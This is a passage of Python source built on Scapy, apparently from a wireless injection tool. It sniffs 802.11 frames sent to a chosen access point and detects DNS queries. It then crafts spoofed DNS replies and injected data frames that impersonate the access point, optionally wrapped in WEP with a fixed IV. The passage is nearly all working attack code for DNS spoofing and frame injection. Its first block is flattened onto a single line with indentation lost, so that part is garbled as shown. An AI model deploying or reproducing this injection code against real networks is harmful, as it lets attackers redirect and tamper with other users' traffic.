os.write(1,"%s\n" % dot11_frame.summary()) if dot11_frame.getlayer(Dot11).addr1 != BSSID: continue # Identifying DNS Queries if dot11_frame.haslayer(DNS) and dot11_frame.getlayer(DNS).qr == 0: if DEBUG: os.write(1,"Received DNS Query on %s\n" % IN_IFACE) if VERB: os.write(1,"%s\n" % dot11_frame.summary()) # Building DNS Reply answer for injection dot11_answer = RadioTap()/Dot11( type = "Data", FCfield = "from-DS", addr1 = dot11_frame.getlayer(Dot11).addr2, addr2 = BSSID) if not HAS_SMAC: dot11_answer.addr3 = dot11_frame.getlayer(Dot11).addr1 else: dot11_answer.addr3 = SMAC if WEP: dot11_answer.FCfield |= 0x40 dot11_answer /= Dot11WEP( iv = "111", keyid = KEYID) dot11_answer /= LLC(ctrl = 3)/SNAP()/IP( src = dot11_frame.getlayer(IP).dst, dst = dot11_frame.getlayer(IP).src, ttl = TTL)
# frame from /dev/net/tun
if f in r:
# tuntap frame max. size is 1522 (ethernet, see RFC3580) + 4
buf = os.read(f,1526)
eth_rcvd_frame=Ether(buf[4:])
if DEBUG:
os.write(1,"Received from %s\n" % ifname)
if VERB:
os.write(1,"%s\n" % eth_rcvd_frame.summary())
# Prepare Dot11 frame for injection
dot11_sent_frame = RadioTap()/Dot11(
type = "Data",
FCfield = "from-DS",
addr1 = eth_rcvd_frame.getlayer(Ether).dst,
addr2 = BSSID)
# It doesn't seem possible to set tuntap interface MAC address
# when we create it, so we set source MAC here
if not HAS_SMAC:
dot11_sent_frame.addr3 = eth_rcvd_frame.getlayer(Ether).src
else:
dot11_sent_frame.addr3 = SMAC
if WEP:
dot11_sent_frame.FCfield |= 0x40
dot11_sent_frame /= Dot11WEP(
iv = "111",
keyid = KEYID)
dot11_sent_frame /= LLC(ctrl = 3)/SNAP(code=eth_rcvd_frame.getlayer(Ether).type)/eth_rcvd_frame.getlayer(Ether).payload
